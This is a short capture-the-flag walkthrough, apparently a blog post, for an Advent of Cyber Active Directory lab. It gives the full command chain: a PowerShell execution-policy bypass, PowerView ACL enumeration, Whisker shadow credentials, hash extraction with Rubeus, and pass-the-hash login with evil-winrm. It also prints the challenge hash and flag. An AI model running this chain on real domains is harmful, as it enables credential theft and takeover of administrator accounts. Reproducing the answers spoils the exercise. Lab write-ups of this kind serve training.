Advent of Cyber — Day 11

What is the hash of the vulnerable user?

go to the Desktop folder > bypass default policy for PowerShell execution > load PowerView script into the memory

cd Desktop
powershell -ep bypass
. .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq “hr” } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

now you will get the vulnerable user as vansprinkles, execute the following command:

.\Whisker.exe add /target:vansprinkles

execute the rebeus.exe command & you should get the NTLM hash

03E805D8A8C5AA435FB48832DAD620E3

What is the content of flag.txt on the Administrator Desktop?

Open terminal and paste this command to use Evil.Winrm: evil-winrm -i THM-MACHINE-IP -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3

Now change the directory to the admin’s desktop: cd C:\Users\Administrator\Desktop

view the flag: flag.txt

THM{XMAS_IS_SAFE}

That’s it | Visit mansoorbarri.com for other hacking & IT related articles.